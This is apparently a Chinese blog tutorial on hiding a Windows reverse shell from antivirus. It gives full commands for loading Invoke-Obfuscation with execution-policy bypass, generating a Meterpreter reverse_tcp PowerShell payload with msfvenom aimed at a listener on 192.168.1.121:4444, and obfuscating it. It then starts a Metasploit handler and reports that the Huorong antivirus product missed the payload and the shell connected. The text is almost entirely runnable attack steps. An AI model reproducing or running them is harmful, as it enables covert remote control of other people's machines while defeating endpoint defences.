目录
Invoke-Obfuscation(psh代码混淆)_不知名白帽的博客-CSDN博客
内网渗透之Windows反弹shell(五)_不知名白帽的博客-CSDN博客
Windows反弹shell
07powershell代码混淆
启动Invoke-Obfuscation
powershell -ep bypass
Import-Module ./Invoke-Obfuscation.psd1
Invoke-Obfuscation
启动成功
用msfvenom生成一个ps1文件
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.121 lport=4444 --arch x64 --platform wiindows -f psh-reflection -o 4444.ps1
启动完成过后,设置混淆脚本代码的位置
set scriptpath +文件位置
选择混淆方式为 TOKEN\ALL
保存混淆之后的脚本
out out.ps1
msf监听
handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.1.121 -P 4444
运行混淆代码,火绒不报毒
执行混淆后的文件,反弹成功了,火绒没拦截
